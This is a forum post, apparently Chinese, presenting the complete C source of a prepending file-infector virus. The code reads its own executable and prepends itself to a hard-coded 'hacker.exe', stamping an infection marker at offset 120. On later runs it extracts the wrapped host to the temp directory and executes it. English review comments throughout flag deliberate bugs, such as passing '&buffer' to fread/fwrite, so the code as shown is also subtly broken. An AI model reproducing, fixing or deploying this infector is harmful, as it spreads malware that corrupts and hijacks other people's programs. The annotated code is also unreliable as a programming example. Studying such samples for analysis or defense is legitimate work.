外壳（前置捆绑式）病毒原理 — a prepending file binder: how it works
别的不多说了，看代码就明白了。本来打算用文件映射实现，可是老是出现“无效句柄”错误，只好改用逐块读写的笨办法。请各位指教。审阅提示：下面的代码存在明显的内存安全缺陷（fread/fwrite 传入的是指针变量的地址 &buffer，而不是缓冲区本身），仅供理解“前置捆绑”的原理，不应原样编译运行。
//bindVirus.c
//Author:leonshoh
#include <stdio.h>
#include <windows.h>
/* Infection marker: Isinfect() compares the 5 bytes it reads at file
 * offset 120 against this string, and infect() writes it at that offset.
 * Five characters plus the terminating NUL, so sizeof(flag) == 6. */
char flag[] = { 'v', 'i', 'r', 'u', 's', '\0' };
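#ifndef _WIN32
/* BOOL/TRUE/FALSE normally come from <windows.h>. Minimal fallback so this
 * marker check can be compiled and unit-tested in isolation on a
 * non-Windows host (e.g. when triaging samples); a Windows build never
 * sees it. */
typedef int BOOL;
#define TRUE 1
#define FALSE 0
#endif

/*
 * Isinfect - report whether `file` already carries the infection marker.
 *
 * The marker is the string `flag` stored at fixed file offset 120, the same
 * offset infect() writes it to. Exactly 5 bytes are read and compared with
 * strcmp() against `flag`, so a flag longer than 5 characters never matches
 * and a flag shorter than 5 only matches if the file bytes after it are NUL.
 *
 * Parameters:
 *   file - path of the file to inspect (opened read-only, binary mode)
 *   flag - marker string to look for (the caller passes the global `flag`)
 *
 * Returns TRUE when the 5 bytes at offset 120 equal `flag`; FALSE when they
 * differ, when the file cannot be opened, or when it is shorter than 125
 * bytes. The stream is closed on every path.
 *
 * Fixes relative to the original: the original had no return statement when
 * fopen() failed (unspecified return value), placed fclose() after the
 * return so the FILE leaked on every call, and did not check fread(), so a
 * short file was compared against uninitialised stack bytes.
 */
BOOL Isinfect(char *file, char *flag)
{
    FILE *fp;
    BOOL found = FALSE;
    char marker[6] = {0};       /* 5 marker bytes + NUL, zeroed up front */

    fp = fopen(file, "rb");
    if (fp == NULL)
        return FALSE;           /* cannot inspect -> treat as not infected */

    /* Only a complete 5-byte read at offset 120 is meaningful; a seek past
     * EOF succeeds on some C libraries, so the fread() count is what matters. */
    if (fseek(fp, 120, SEEK_SET) == 0 &&
        fread(marker, sizeof(char), 5, fp) == 5 &&
        strcmp(marker, flag) == 0)
        found = TRUE;

    fclose(fp);                 /* always close, unlike the original */
    return found;
}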
/*
 * infect - prepend this program's own image to `file` and stamp it.
 *
 * Writes `virussize` bytes of `viruscode` to "temp.temp$" in the current
 * directory, appends the original contents of `file` after them, writes
 * `flag` at offset 120 of the result, then replaces `file` with the temp
 * file (unlink + rename). Declared BOOL but never returns a value.
 *
 * Parameters:
 *   file      - path of the host executable to wrap (main() passes "hacker.exe")
 *   flag      - marker string that Isinfect() later looks for at offset 120
 *   viruscode - bytes to prepend (main() reads them from argv[0])
 *   virussize - number of bytes in viruscode (main() passes the constant 4640)
 *
 * Review notes (defects visible in this body, deliberately not fixed here):
 *  - fread()/fwrite() are handed `&buffer` / `&viruscode`, i.e. the address
 *    of the pointer variable on the stack, not the memory it points to. The
 *    heap buffer is never filled; a read of `low` bytes overwrites the stack
 *    starting at `buffer`, and the writes copy stack bytes into the output.
 *  - If fopen(file) fails, `buffer` and `low` are used uninitialised below.
 *  - malloc() is unchecked and the allocation is never freed.
 *  - `flag` is a char*, so sizeof(flag)+1 is 5 or 9 depending on pointer
 *    width, not the marker length; on a 64-bit build this reads past the
 *    6-byte "virus" string.
 *  - Offset 120 lies inside the prepended `viruscode` bytes, so the marker
 *    overwrites part of the carrier's own header region (presumably meant to
 *    land in the DOS stub - verify against the built PE).
 *  - "temp.temp$" is a fixed, predictable name in the working directory, and
 *    unlink()/rename() results are not checked, so a failure loses `file`.
 */
BOOL infect(char *file,char *flag,char *viruscode,DWORD virussize)
{
FILE *fp,*fp1;
char *buffer;
DWORD i=0,j,k,low;
fp1=fopen(file,"rb");
if(fp1)
{
fseek(fp1,0,2); /* 2 == SEEK_END: measure the host file */
low=ftell(fp1);
j=low;
buffer=(char *)malloc(low); /* unchecked allocation, never freed */
fseek(fp1,0,0); /* 0 == SEEK_SET */
while(j>i)
{
k=fread(&buffer,sizeof(char),j-i,fp1); /* BUG: &buffer is the pointer's own address; the heap buffer is never written and the stack is overrun */
i=i+k;
}
fclose(fp1);
}
fp=fopen("temp.temp$","wb"); /* predictable temp name in the current directory */
if(fp)
{
i=0;
j=virussize;
while(j>i)
{
k=fwrite(&viruscode,sizeof(char),j-i,fp); /* BUG: writes stack bytes starting at the pointer variable, not the code */
i=i+k;
}
i=0;
j=low; /* uninitialised if the fopen(file) above failed */
fseek(fp,0,2);
while(j>i)
{
k=fwrite(&buffer,sizeof(char),j-i,fp); /* BUG: same &buffer mistake; `buffer` itself may be uninitialised */
i=i+k;
}
fseek(fp,120,0); /* marker offset; must match the 120 used in Isinfect() */
fwrite(flag,sizeof(char),sizeof(flag)+1,fp); /* sizeof(char*)+1 bytes, not strlen(flag)+1 */
fclose(fp);
}
unlink(file); /* not declared by <stdio.h>; MSVC provides it via <io.h> (as _unlink) - implicit declaration here */
rename("temp.temp$",file); /* unchecked; no return statement follows despite the BOOL return type */
}
/*
 * UnbindFile - extract the wrapped host from `file` and run it.
 *
 * Copies bytes [virussize, filesize) of `file` into a fresh file in the
 * user's temp directory, starts it with CreateProcess(), waits for it to
 * exit, then deletes the temp file. Called from main() when Isinfect()
 * finds the marker, so `file` is normally argv[0]. Declared BOOL but never
 * returns a value.
 *
 * Parameters:
 *   file      - path of the infected (prepended) executable
 *   virussize - number of leading bytes belonging to the carrier (main() passes 4640)
 *   filesize  - total size of `file` as measured by main()
 *
 * Review notes (defects visible in this body, deliberately not fixed here):
 *  - fread()/fwrite() again receive `&buffer`, the address of the pointer
 *    variable, so the host bytes never reach the heap buffer and the stack
 *    is overwritten with file contents.
 *  - `filesize - virussize` is unsigned DWORD arithmetic; if the file is
 *    shorter than virussize the length wraps to ~4 GiB, and malloc() is
 *    unchecked.
 *  - fp1 is opened before fp is checked: if fopen(file) fails fp1 leaks,
 *    and if fopen(NewFile) fails fclose(fp1) is called on NULL.
 *  - GetTempFileName() is called with a non-zero uUnique (256), so it
 *    neither creates the file nor checks that the name is unused: the name
 *    is predictable and another local process can plant a file there before
 *    CreateProcess() runs it.
 *  - CreateProcess() is unchecked; on failure ProcessInformation is
 *    uninitialised when WaitForSingleObject() reads it. The returned process
 *    and thread handles are never closed.
 *  - The extracted payload runs with this process's privileges from the
 *    temp directory; nothing verifies what was written there is what runs.
 */
BOOL UnbindFile(char *file,DWORD virussize,DWORD filesize)
{
FILE *fp,*fp1;
char TempPath[MAX_PATH];
char NewFile[256];
DWORD i,j,k;
char *buffer;
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInformation;
GetTempPath(MAX_PATH,TempPath); /* return value unchecked */
GetStartupInfo(&StartupInfo); /* fills StartupInfo.cb and the rest */
GetTempFileName(TempPath,"vir",256,NewFile); /* uUnique != 0: name is "vir" + hex(256), not created, not checked for collisions */
fp=fopen(file,"rb");
fp1=fopen(NewFile,"wb"); /* opened before fp is validated; leaks if fp is NULL */
if(fp)
{
fseek(fp,virussize,0); /* skip the carrier bytes; 0 == SEEK_SET */
i=0;
j=filesize-virussize; /* wraps if filesize < virussize */
buffer=(char *)malloc(j); /* unchecked, never freed */
while(j>i)
{
k=fread(&buffer,sizeof(char),j-i,fp); /* BUG: &buffer is the pointer's own address; should be buffer */
i=i+k;
}
if(fp1)
{
i=0;j=filesize-virussize;
while(j>i)
{
k=fwrite(&buffer,sizeof(char),j-i,fp1); /* BUG: same &buffer mistake */
i=i+k;
}
}
fclose(fp1); /* NULL if fopen(NewFile) failed */
fclose(fp);
}
CreateProcess(NewFile,NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInformation); /* unchecked */
WaitForSingleObject(ProcessInformation.hProcess,INFINITE); /* garbage handle if CreateProcess failed; handles never closed */
unlink(NewFile); /* implicit declaration; MSVC declares it in <io.h>; no return statement follows */
}
/*
 * Program entry point.
 *
 * Reads this executable (argv[0]) fully into memory, then either:
 *   - if Isinfect() finds the marker at offset 120 -> UnbindFile(): extract
 *     the host that follows the first 4640 bytes and execute it; or
 *   - otherwise -> infect(): prepend these bytes to "hacker.exe" in the
 *     current directory and stamp the marker.
 *
 * Review notes (defects visible in this body, deliberately not fixed here):
 *  - `void main` is non-standard; it should be `int main`.
 *  - fread() gets `&viruscode` rather than `viruscode`: the pointer variable
 *    and the stack after it are overwritten while the heap buffer stays empty.
 *  - argv[0] is whatever the parent process passed; on Windows it need not
 *    be a full path or carry the ".exe" suffix, so fopen() can fail, in which
 *    case `filesize` and `viruscode` are used uninitialised. GetModuleFileName()
 *    is the reliable way to locate the running image.
 *  - 4640 is the assumed byte size of the built carrier; it must equal the
 *    actual executable size or UnbindFile() slices the host at the wrong
 *    offset and infect() prepends a truncated copy.
 *  - malloc() is unchecked and never freed; argc is not checked.
 */
void main(int argc,char **argv)
{
FILE *fp;
DWORD filesize;
char *viruscode;
DWORD i=0,k;
fp=fopen(argv[0],"rb"); /* assumes argv[0] is an openable path to this image */
if(fp){
fseek(fp,0,2); /* 2 == SEEK_END */
filesize=ftell(fp);
viruscode=(char *)malloc(filesize); /* unchecked, never freed */
fseek(fp,0,0); /* 0 == SEEK_SET */
while(filesize>i)
{
k=fread(&viruscode,sizeof(char),filesize-i,fp); /* BUG: &viruscode is the pointer's own address; should be viruscode */
i=i+k;
}
fclose(fp);
}
if(Isinfect(argv[0],flag))
{
UnbindFile(argv[0],4640,filesize); /* 4640 == assumed size of the carrier; filesize uninitialised if fopen failed */
}
else
{
infect("hacker.exe",flag,viruscode,4640); /* hard-coded target in the current directory */
}
}
本文由GOD_Father 发布于Linuxsky 论坛,网址:http://bbs.linuxsky.org/thread-587-1-1.html